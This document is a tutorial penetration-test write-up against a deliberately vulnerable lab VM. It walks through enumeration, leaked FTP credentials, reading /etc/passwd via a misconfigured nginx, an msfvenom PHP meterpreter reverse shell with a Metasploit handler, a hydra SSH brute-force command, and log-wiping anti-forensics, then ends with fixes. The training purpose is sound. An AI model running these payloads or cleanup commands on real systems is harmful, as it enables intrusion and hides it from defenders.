Introduction to Penetration Testing
Introduction
An internal pentest is a dedicated attack, carried out the way a real attacker would, for the purpose of evaluating a network and its machines. The findings are then reported back so the network's defenses can be improved against future attacks.
In this test, only a single machine was tested. This machine was compromised due to misconfigurations in the software and also through the leakage of sensitive information, such as administrative passwords. The end result was that the machine attacked during the penetration test was fully compromised with administrative privileges.
Disclaimer
I have provided a virtual machine that anyone can follow along with while reading this writeup.
Do note that what you see here does not reflect a real-life penetration test. Though some things may be similar, this virtual machine was created with the idea of teaching methods and a way of thinking rather than being truly realistic. Even so, it's possible to gain a lot of knowledge from following this tutorial.
One other thing to mention is that I used Kali Linux for this writeup. For best results, use Kali Linux if you plan on following along. Kali Linux isn't specifically required for penetration testing, but it comes ready out of the box.
Warning
It goes without saying, but never attack a machine that you don't have permission to work on. It can cause trouble for you or for other people. If you need to practice, there are places to get vulnerable virtual machines such as vulnhub.com and pentesterlab.com.
Downloading
The VM can be downloaded from the following location.
https://mega.nz/#!c7p1wC7a!d6ibjo3QHxtUj1OmF33MTeR5Hxsq9Lp9lAaN8swmx4M
It's in OVA format so it should be able to be imported into VirtualBox with no issues.
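If you prefer the command line over the VirtualBox GUI, the OVA can also be imported with VBoxManage. The filename below is just a placeholder for whatever the download is saved as:
VBoxManage import xvm.ova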
Troubleshooting VM Configuration
When using the VM, a DHCP issue may sometimes prevent it from acquiring a new IP address when it boots up. In order to remedy this I created a special user with the credentials xvmadmin/xvmadmin that can be used to fix the DHCP settings.
To fix DHCP issues, you can edit the /etc/network/interfaces file and add something similar to the following in order to assign a static IP address.
auto eth0
iface eth0 inet static
address 192.168.1.55
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.1
dns-nameservers 8.8.8.8 8.8.4.4
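After saving the file, the new settings can be applied by bouncing the interface or simply rebooting the VM. On a Debian-based system like this one, something along these lines should work:
ifdown eth0 && ifup eth0    # or: systemctl restart networking, or just reboot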
Methodology
Finding the VM
There are two ways to find the IP address of the VM. You can log in using the credentials provided in the troubleshooting section and run ifconfig to view all the attached interfaces, or you can use a tool like netdiscover or arp-scan. Below is an example of running netdiscover. One thing to note is that VMs hosted in VirtualBox show up with the vendor name of Cadmus Computer Systems.
Currently scanning: 192.168.91.0/16 | Screen View: Unique Hosts
36 Captured ARP Req/Rep packets, from 9 hosts. Total size: 2160
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.227 10:0d:7f:4d:b7:ec 5 300 Unknown vendor
192.168.1.1 20:e5:2a:08:fa:0e 6 360 Unknown vendor
192.168.1.11 b8:27:eb:9a:ae:22 2 120 Unknown vendor
192.168.1.142 02:0f:b5:e8:58:0c 2 120 Unknown vendor
192.168.1.169 00:6b:9e:37:31:b5 1 60 Unknown vendor
192.168.1.189 08:00:27:7f:c6:40 1 60 Cadmus Computer Systems
192.168.1.236 70:77:81:29:14:35 1 60 Unknown vendor
192.168.1.226 02:0f:b5:40:c4:d2 1 60 Unknown vendor
172.20.100.245 02:0f:b5:01:a4:7f 13 780 Unknown vendor
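As an alternative to netdiscover, arp-scan can do a quick one-shot sweep of the local network. It needs root, and the interface name below is an assumption that may differ on your setup:
arp-scan --interface=eth0 --localnet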
Initial Enumeration
In my case the target IP is 192.168.1.189. If you're following along, you will most likely have a different target IP address, so take note of that.
After finding the target IP we can start the initial enumeration process. Enumeration is the main component of penetration testing: it works by checking every detail you possibly can and then seeing what you can learn from it. The best way to start this on a network is with nmap.
Nmap is a port scanner; it can be either light or noisy depending on the flags/options used. Doing a full aggressive scan on every port is the most thorough way of gathering accurate information, but it is not always possible. The noisier a scan, the more traffic it creates. Creating more traffic means you'll be easier to detect, and in some cases a scan that is too strong can crash a weaker machine. However, since we're targeting our own virtual machine we can be as noisy as we want. Below is an example nmap command and its related options.
nmap -v -Pn -A -sC -sS <IP ADDRESS> -p-
Parameter/Flag Meanings
-v : Increased verbosity level
- Nmap prints its output to the terminal in real time
- Allows for faster enumeration

-Pn : Treat host as online
- Skips host discovery; this merely speeds up the scan

-A : Aggressive scan. This option enables:
- OS Detection
- Version Detection
- Script Scanning
- Traceroute

-sC : Default script scan
- Loads the default NSE scripts
- Nmap NSE scripts can be used for additional scanning of a particular port or service
- On Kali Linux distributions, they are located at /usr/share/nmap/scripts

-sS : Stealth/SYN scan - a TCP port scanning method
- It involves sending SYN packets to various ports without completing a TCP handshake
- In return, the target machine sends a SYN-ACK response when a port is open
- No final ACK needs to be sent in response
- Contrary to its name, a SYN scan is not stealthy at all; in the past this method would bypass firewall logging, but this is no longer true
- Scanning is performed faster due to not completing the three-way handshake

-p- : Scan all 65535 ports
- By default nmap only scans the 1000 most common ports
- Scanning every port takes a long time and generates visible traffic
Using these nmap options we run a scan on the target machine.
root@kali:~# nmap -v -Pn -A -sC -sS 192.168.1.189 -p-
...snip...
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 65 Feb 27 19:05 account-details.txt
|_drwxr-xr-x 2 ftp ftp 4096 Feb 27 20:34 pub
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 17:f9:81:b4:24:55:57:ae:f0:46:d1:3d:fd:ef:ef:6e (DSA)
| 2048 50:6a:91:12:2d:39:24:fa:be:1c:c6:97:90:63:bf:7a (RSA)
|_ 256 79:16:05:d9:ac:6c:75:51:51:84:a1:86:4f:dc:03:71 (ECDSA)
80/tcp open http nginx
|_http-generator: GravCMS
| http-robots.txt: 9 disallowed entries
| /backup/ /bin/ /cache/ /grav/ /logs/ /system/ /vendor/
|_/user/ /admin/
|_http-server-header: nginx
|_http-title: Blog | Saturn
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 48665/udp status
|_ 100024 1 56403/tcp status
8000/tcp open http nginx
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx
|_http-title: Welcome to nginx on Debian!
8080/tcp open http nginx
|_http-server-header: nginx
|_http-title: 403 Forbidden
56403/tcp open status 1 (RPC #100024)
...snip...
It's generally a good idea to parse through the information and organize it. One key thing that stands out from the scan is that this is a Linux machine. We can sum up our initial findings in a table.
Port | Service | Version | Misc. Details |
---|---|---|---|
21 | ftp | vsftpd 3.0.2 | Anonymous login allowed |
22 | ssh | OpenSSH 6.7p1 | n/a |
80 | http | nginx | Running GravCMS, has a robots.txt |
111 | rpcbind | n/a | n/a |
8000 | http | nginx | n/a |
8080 | http | nginx | n/a |
56403 | status | n/a | n/a |
Before moving on to enumerating each service individually, we can search exploit-db for exploits affecting any software we found. On Kali Linux this can be done with the searchsploit command.
root@kali:~# searchsploit vsftpd
--------------------------------------------------------------- -----------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
--------------------------------------------------------------- -----------------------------
vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption E | ./linux/dos/5814.pl
vsftpd 2.3.2 - Denial of Service | ./linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution | ./unix/remote/17491.rb
vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of | ./windows/dos/31818.sh
vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of | ./windows/dos/31819.pl
--------------------------------------------------------------- -----------------------------
FTP
According to our nmap scan, FTP is configured to allow anonymous login.
21/tcp open ftp syn-ack ttl 64 vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 65 Feb 27 18:05 account-details.txt
|_drwxr-xr-x 2 ftp ftp 4096 Feb 27 14:29 pub
Anonymous login by itself is not a bad thing. However, if it is misconfigured it may provide access to sensitive files.
In order to log in to FTP, we provide the username anonymous, which lets us enter as an anonymous user.
root@kali:~# ftp 192.168.1.189
Connected to 192.168.1.189.
220 (vsFTPd 3.0.2)
Name (192.168.1.189:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
A directory listing reveals a file named account-details.txt. Using the get command retrieves the file and places it into the current directory of your terminal.
Note: For a list of available FTP commands you can simply type help. Additionally, if you would like to know more about a specific command you can use help <COMMAND>.
ftp> help get
get receive file
As shown below, we use this command to retrieve the file.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 65 Feb 27 18:05 account-details.txt
drwxr-xr-x 2 ftp ftp 4096 Feb 27 14:29 pub
226 Directory send OK.
ftp> get account-details.txt
local: account-details.txt remote: account-details.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for account-details.txt (65 bytes).
226 Transfer complete.
65 bytes received in 0.00 secs (463.3326 kB/s)
ftp> exit
221 Goodbye.
The file reveals info about an admin account and provides Password1234 as a credential. This set of credentials may turn out to be useful later.
root@kali:~# cat account-details.txt
-Account Setup-
I set up your admin account.
Pass: Password1234
SSH
SSH is usually hard to break through unless there is some sort of exploit lying around. That leaves one other method, password attacks, which are not very advisable in a real test due to the amount of noise they make and the possibility of getting locked out.
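Purely for reference, a password attack against SSH with hydra might look something like this. The username and wordlist here are just examples (on Kali, rockyou.txt first needs to be extracted from rockyou.txt.gz), and we do not run it against this VM:
hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 4 ssh://192.168.1.189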
Seeing as we acquired some credentials earlier, we can try to log in. We don't know any usernames, but we do know that this is a Linux machine and that root is always a default user.
root@kali:~# ssh [email protected]
[email protected]'s password:
Permission denied, please try again.
However, it seems that the credential Password1234 doesn't work. Recall that the message we acquired earlier through FTP mentioned an admin account, so perhaps there is an admin user.
root@kali:~# ssh [email protected]
[email protected]'s password:
Permission denied, please try again.
But once again it is of no use. As we can see, SSH doesn't indicate whether a user exists or not, which makes it harder for an attacker to break through.
HTTP Enumeration
For HTTP enumeration we can use tools like nikto. Nikto is an open source web scanner and a good go-to tool when looking for vulnerabilities on a web server. However, it is extremely noisy and can potentially bring down a weaker server.
Nikto tends to give out a lot of information and this can sometimes lead to a lot of false positives. This is especially true when a web server responds with 2xx success status codes to any directory that nikto checks. Below is an example of a nikto command.
nikto -h <IP ADDRESS>:<PORT>
-h : Target address
- This flag is needed in order to specify a target
- Example: nikto -h google.com or nikto -h 74.125.224.72
Port 80
According to nmap this page should be some sort of CMS. A CMS (Content Management System) is an application for managing content; a lot of websites use one for displaying and managing their pages. CMSs tend to be vulnerable if left unpatched, and they are also often a good means of acquiring a shell on the target machine. This particular machine is running the Grav CMS.
root@kali:~# nikto -h 192.168.1.189:80
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.189
+ Target Hostname: 192.168.1.189
+ Target Port: 80
+ Start Time: 2017-04-10 14:05:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx
+ The anti-clickjacking X-Frame-Options header is not present.
+ Cookie grav-site-b3974d7 created without the httponly flag
+ All CGI directories 'found', use '-C none' to test none
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x58b4b5f4 0xd7
+ Cookie grav-site-b3974d7-admin created without the httponly flag
+ "robots.txt" contains 11 entries which should be manually viewed.
+ OSVDB-637: /~root/: Allowed to browse root's home directory.
+ OSVDB-637: /~ftp/: Allowed to browse ftp user's home directory.
+ 26199 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2017-04-10 14:15:58 (GMT-4) (638 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
One common thing on websites is the robots.txt file. It is used to tell bots which locations not to scan; these locations are usually directories or administrative pages. In this case it reveals the page /admin/.
root@kali:~# curl 192.168.1.189/robots.txt
User-agent: *
Disallow: /backup/
Disallow: /bin/
Disallow: /cache/
Disallow: /grav/
Disallow: /logs/
Disallow: /system/
Disallow: /vendor/
Disallow: /user/
Disallow: /admin/
Allow: /user/pages/
Allow: /user/themes/
Navigating to http://192.168.1.189/admin reveals an admin page.
The credentials we gained from the FTP server, admin/Password1234, turn out to work here.
This allows us to gain access to the Grav CMS admin console. However, there doesn't seem to be anything here we can use to gain a shell on the machine. This particular CMS uses flat files and doesn't seem to have any of the vulnerabilities that other CMSs have. One piece of information that we can take away from the admin console is that the admin's name is Justin.
Port 8000
This page appeared to be just a standard static nginx page.
root@kali:~# nikto -h 192.168.1.189:8000
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.189
+ Target Hostname: 192.168.1.189
+ Target Port: 8000
+ Start Time: 2017-04-10 14:06:12 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx
+ Server leaks inodes via ETags, header found with file /, fields: 0x58b3242d 0x363
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7537 requests: 0 error(s) and 2 item(s) reported on remote host
+ End Time: 2017-04-10 14:06:31 (GMT-4) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Port 8080
This port is interesting. Nikto has revealed that files on the operating system's filesystem may be accessed and retrieved through the web server.
root@kali:~# nikto -h 192.168.1.189:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.189
+ Target Hostname: 192.168.1.189
+ Target Port: 8080
+ Start Time: 2017-04-10 14:06:24 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server leaks inodes via ETags, header found with file /bin/ss, fields: 0x5409cf66 0x130a0
+ /bin/ss: Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.
+ /bin/date: Gateway to the unix command, may be able to submit extra commands
+ ///etc/passwd: The server install allows reading of any system file by adding an extra '/' to the URL.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-3092: /etc/passwd: An '/etc/passwd' file is available via the web site.
+ 8348 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2017-04-10 14:06:47 (GMT-4) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
We can use curl to try retrieving the /etc/passwd file in order to prove this. Curl is a tool that can retrieve banners or protocol info, and when used against a web page it prints the contents to the terminal.
root@kali:~# curl 192.168.1.189:8080/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
grav:x:1000:1000:,,,:/home/grav:/bin/bash
ftp:x:108:114:ftp daemon,,,:/srv/ftp:/bin/false
justin:x:1001:1001::/home/justin:/bin/rbash
xvmadmin:x:1002:1002::/home/xvmadmin:/bin/sh
We can also try to curl other files like /etc/shadow, which contains the password hashes for all user accounts. However, this is unsuccessful due to permissions: the shadow file is only readable by root-level accounts. If this web server were running as root it would be possible to view its contents, but on Linux the default user for hosting websites is usually www-data.
root@kali:~# curl 192.168.1.189:8080/etc/shadow
<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx</center>
</body>
</html>
Looking back at our findings, something catches our attention: the name of the admin we found in the Grav admin console matches one of the existing users, justin:x:1001:1001::/home/justin:/bin/rbash.
With this in mind we can try using SSH to log in as that user with the same credentials that we used to gain access to the website.
Gaining Access
root@kali:~# ssh [email protected]
The authenticity of host '192.168.1.189 (192.168.1.189)' can't be established.
ECDSA key fingerprint is SHA256:aDJ2HNZTZlKZImDW3reaQA2zzrjZTh+LIOfxFlNKujQ.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.189' (ECDSA) to the list of known hosts.
[email protected]'s password:
____ ___ ____ ___ ___ ___ ____ ____ ____
`MM( )M' `Mb( )d' `MMb dMM' 6MMMMb 6MMMMb 6MMMMb
`MM. d' YM. ,P MMM. ,PMM 8P Y8 8P Y8 8P Y8
`MM. d' `Mb d' M`Mb d'MM 6M Mb 6M Mb 6M Mb
`MM. d' YM. ,P M YM. ,P MM MM MM MM MM MM MM
`MMd `Mb d' M `Mb d' MM MM MM MM MM MM MM
dMM. YM. ,P M YM.P MM MM MM MM MM MM MM
d'`MM. `Mb d' M `Mb' MM MMMMMMM MM MM MM MM MM MM
d' `MM. YM,P M YP MM YM M9 YM M9 YM M9
d' `MM. `MM' M `' MM 8b d8 8b d8 8b d8
_M(_ _)MM_ YP _M_ _MM_ YMMMM9 YMMMM9 YMMMM9
Welcome to XVM-000!
Last login: Tue Mar 28 02:09:28 2017
justin@XVM-000:~$ id
uid=1001(justin) gid=1001(justin) groups=1001(justin)
We quickly find out that we are stuck inside an instance of rbash. This is a restricted shell and certain commands are not available. Additionally, we are unable to leave the home directory.
justin@XVM-000:~$ cd /
-rbash: cd: restricted
One way to get out of this situation is by exploiting the misconfiguration that allows us to read files like /etc/passwd through the web server on port 8080. If that nginx server also allows PHP execution, we can use it to execute a payload that sends a reverse shell back to the Kali Linux machine.
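For context, a server block that behaves this way might look roughly like the following. This is a hypothetical sketch of the kind of misconfiguration involved, not the VM's actual configuration:
server {
    listen 8080;
    # Serving the filesystem root exposes /etc/passwd, /home, and everything else
    root /;
    # Passing any reachable .php file to PHP-FPM lets an uploaded payload execute
    location ~ \.php$ {
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass unix:/var/run/php5-fpm.sock;
    }
}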
One problem, though, is that rbash will not let us write to a file using output redirection.
justin@XVM-000:~$ echo "test" > test.txt
-rbash: test.txt: restricted: cannot redirect output
Some of these restricted shells have a list of commands that are not allowed. These lists are not always complete, so we can look for anything that still lets us write to a file. In this case it turns out that using nano to write a file is completely okay.
On the Kali Linux machine we can use msfvenom to generate a PHP payload. Msfvenom can generate many types of payloads depending on the file type or format needed. A payload is just a file that executes on the server; in this case it executes a reverse shell on the target machine that connects back to our attacking machine.
The following command generates the payload for us. Note that the IP address used is our attacking machine's and not the target machine's.
root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.158 LPORT=443 -f raw
The generated payload requires removing the comment characters at the front of the file (so the opening <?php tag is active) in order to work. Afterwards we can paste it into nano through the SSH shell that we have open and save it as shell.php. Now we simply need to request the file over HTTP. Using realpath on the target machine's shell shows the exact location that we need to visit.
justin@XVM-000:~$ realpath shell.php
/home/justin/shell.php
Before we can visit it we must first set up a handler. A handler is basically something that catches the shell: since we are using a reverse shell, the victim machine sends a shell back to the IP address and port that the attacking machine is listening on.
Two common ways to catch a shell are nc and Metasploit's handler, which is part of the Metasploit framework and understands meterpreter. In our case we are using the payload php/meterpreter_reverse_tcp, a Meterpreter payload that only the Metasploit handler can catch. Many Metasploit payloads are also staged, meaning the rest of the payload is only sent over to the machine once a connection is made; that is something nc cannot do.
We can set up the Metasploit handler by doing the following. First we start Metasploit with the msfconsole command, then we configure the handler.
root@kali:~# msfconsole
…snip…
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter_reverse_tcp
PAYLOAD => php/meterpreter_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
We use curl again to visit the page, but this time it executes our reverse shell.
curl http://192.168.1.189:8080/home/justin/shell.php
The moment the payload executes, we get a meterpreter session.
[*] Started reverse TCP handler on 192.168.1.158:443
[*] Starting the payload handler...
msf exploit(handler) > [*] Meterpreter session 1 opened (192.168.1.158:443 -> 192.168.1.189:39288) at 2017-04-10 14:22:05 -0400
sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : XVM-000
OS : Linux XVM-000 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u1 (2017-02-22) x86_64
Meterpreter : php/linux
We are now in a meterpreter shell, and meterpreter has its own set of usable commands. However, if we want to run Linux commands we can create another shell into the system.
meterpreter > shell
Process 773 created.
Channel 0 created.
The Linux shell we have now is slightly troublesome and may cause issues with certain commands. It is not an interactive shell like SSH, so it can feel a little funky. It is usually good practice to spawn a proper shell whenever you connect to a machine through a reverse shell. Since we know this is a Linux machine, Python will most likely be installed by default, so we can spawn a new shell with the following.
python -c 'import pty; pty.spawn("/bin/sh")'
There are many ways to enumerate a Linux system for information. A good resource that details this is g0tmi1k's Basic Linux Privilege Escalation guide. Following that kind of checklist, we can eventually find our way into acquiring root privileges.
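A few of the usual manual checks are sketched below. These are generic examples rather than a transcript from this VM:
uname -a                                  # kernel version, useful for kernel exploit searches
id && hostname                            # who we are and where we are
cat /etc/issue                            # distribution and release
sudo -l                                   # commands we may run via sudo (will prompt for a password)
find / -perm -4000 -type f 2>/dev/null    # SUID binaries
ls -al /root /home/* 2>/dev/null          # readable home directories
crontab -l; ls -al /etc/cron*             # scheduled jobs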
Eventually we should come to realize that the root user's files are readable. This can be seen by using ls -al to list all files and their permissions while inspecting each directory.
drwxrwxrwx 2 root root 4096 Mar 28 02:12 .
drwxr-xr-x 22 root root 4096 Feb 26 13:26 ..
-rwxrwxrwx 1 root root 101 Mar 28 02:26 .bash_history
-rwxrwxrwx 1 root root 570 Jan 31 2010 .bashrc
-rwxrwxrwx 1 root root 140 Nov 19 2007 .profile
-rwx------ 1 root root 33 Mar 28 01:55 proof.txt
While this does not seem like a huge deal, it can very well be one if there is sensitive info lying around. Inside the root directory we can also read the bash history file with cat /root/.bash_history. This file is a list of commands the user ran while working in their terminal. Upon closer inspection we see that the user changed their password with a method that blatantly displays the password in clear text.
echo "root:azfruby1337" | chpasswd
Now we need to find a way to use these credentials. One way that sticks out is to use SSH like we did earlier. It is usually best practice to disable root password login over SSH, because root is a default user that is always present and easy to brute force. This is especially true for internet-facing servers: bots roam the internet looking for port 22 and attempting to break in. In fact, a friend of mine was managing a cloud server that had root login enabled; after a while he noticed weird files on his server, and the logs showed that someone had broken in and taken over the system by brute forcing the root user's password over SSH.
With this in mind we can SSH as the root user and get the proof.
root@kali:~# ssh [email protected]
[email protected]'s password:
____ ___ ____ ___ ___ ___ ____ ____ ____
`MM( )M' `Mb( )d' `MMb dMM' 6MMMMb 6MMMMb 6MMMMb
`MM. d' YM. ,P MMM. ,PMM 8P Y8 8P Y8 8P Y8
`MM. d' `Mb d' M`Mb d'MM 6M Mb 6M Mb 6M Mb
`MM. d' YM. ,P M YM. ,P MM MM MM MM MM MM MM
`MMd `Mb d' M `Mb d' MM MM MM MM MM MM MM
dMM. YM. ,P M YM.P MM MM MM MM MM MM MM
d'`MM. `Mb d' M `Mb' MM MMMMMMM MM MM MM MM MM MM
d' `MM. YM,P M YP MM YM M9 YM M9 YM M9
d' `MM. `MM' M `' MM 8b d8 8b d8 8b d8
_M(_ _)MM_ YP _M_ _MM_ YMMMM9 YMMMM9 YMMMM9
Welcome to XVM-000!
Last login: Mon Apr 10 13:19:56 2017
root@XVM-000:~# cat /root/proof.txt
WW91IGhhdmUgcHduZWQgWFZNLTAwMCEK
House Cleaning/Anti-Forensics
It is important for penetration testers not to leave traces or exploits lying around on their target machines. This doesn't matter too much in our case since we used a vulnerable virtual machine as our target, but it is still a good habit. Anything that was transferred to the server should be removed, and it is a good idea to work out of the /tmp directory for easy removal. There are also log files that may show hints that a penetration test took place, for example the bash history file or the nginx log file, which is probably filled with random requests from Nikto. It might be a good idea to wipe these clean.
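As a rough sketch, cleanup on this VM might look something like the following. The log paths are typical Debian defaults and are assumptions rather than paths confirmed on the target:
rm /home/justin/shell.php          # remove the uploaded payload
history -c && unset HISTFILE       # stop the current shell from saving history
cat /dev/null > ~/.bash_history    # empty any history already written
> /var/log/nginx/access.log        # truncate web server logs filled by nikto/nmap requests
> /var/log/nginx/error.log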
Recommendations
There were quite a few things wrong with this server. Below is a table highlighting these issues and their fixes.
Service | Issue | Fix |
---|---|---|
FTP | Anonymous login displayed sensitive info | Move sensitive files or disable anonymous log in |
SSH | Root login enabled | Disable root login |
HTTP Port 80 - GravCMS | Weak credentials | Use stronger credentials |
HTTP Port 8080 | Displays file system | Change nginx configuration |
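For reference, the SSH fix from the table above is usually a one-line change in /etc/ssh/sshd_config followed by a service restart:
# /etc/ssh/sshd_config
PermitRootLogin no        # or "prohibit-password" to allow key-based root logins only
# then restart the service, e.g.: systemctl restart ssh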
Conclusion
This writeup should hopefully give some insight into penetration testing for people who are new to it. Just remember that this isn't an example of a real production environment; a real environment will be vastly different.